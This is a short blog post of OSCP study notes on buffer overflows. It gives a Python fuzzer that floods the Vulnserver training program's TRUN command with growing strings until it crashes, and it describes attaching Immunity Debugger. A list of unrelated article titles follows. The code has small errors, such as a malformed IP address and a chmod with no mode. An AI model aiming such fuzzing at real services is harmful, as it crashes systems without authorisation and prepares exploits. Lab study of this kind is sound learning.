OSCP Learning Notes - Buffer Overflows(1)
2024-10-09 10:24:44
Introduction to Buffer Overflows
Anatomy of Memory
Anatomy of the Stack
Fuzzing
Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver
Immunity Debuger - https://www.immunityinc.com/products/debugger/
Vulnserver Test
1. Open the vulnserver program on windows os.
2. Connect to the vulnserver from Kali Linux.
nc -nv 10.0..XX
3.Write the Python fuzzer test script on Kali Linux
#!/usr/bin/python
import socket
import sys buffer=["A"]
counter=100
while len(buffer) <= 30:
buffer.append("A"*counter)
counter=counter+200 for string in buffer:
print "Fuzzing vulnserver with %s bytes" % len(string)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.0.0.XX',9999))
s.send('TRUN /.:/' + string)
s.close()
Grant the rights to the script file and execute the fuzzer.py.
chmod fuzzer.py
./fuzzer.py
The vulnserver crashed with 5900 bytes.
Immunity Debuger
GUI Screenshoot
Open or attach the vulnserver program.
Perform the fuzzer.py on Kali Linux.
./fuzzer.py
The vulnserver crashed finally.
最新文章
- C#实现在图片上斜着写字
- Linux CentOS下如何确认MySQL服务已经启动
- Swift中的Masonry第三方库&mdash;&mdash;SnapKit
- 二十四种设计模式:装饰模式(Decorator Pattern)
- [Flex] PopUpButton系列 —— 设置弹出菜单与主按钮之间的间隔
- 让网站变灰的CSS代码(支持IE、FIREFOX和CHROME)
- SQL Server查询优化方法(查询速度慢的原因很多,常见如下几种) .
- spring mvc 使用及json 日期转换解决方案
- 源码来袭!!!基于jquery的ajax分页插件(demo+源码)
- eNSP自学入门(基础)
- shell变量$(CURDIR),$0,$1,$2,$#含义解释
- 【scikit-learn 0.19 中文文档 】安装 scikit-learn | ApacheCN
- 文件末尾判断feof
- Xilinx Vivado的使用详细介绍(4):Zedboard+vivado之流水灯(加SDK)
- 用递归方法计算斐波那契数列(Recursion Fibonacci Sequence Python)
- 《Inside C#》笔记(二) 初识C#
- iOS 判断App启动方式
- django中表单处理
- Python 连接 redis 模块
- 关于div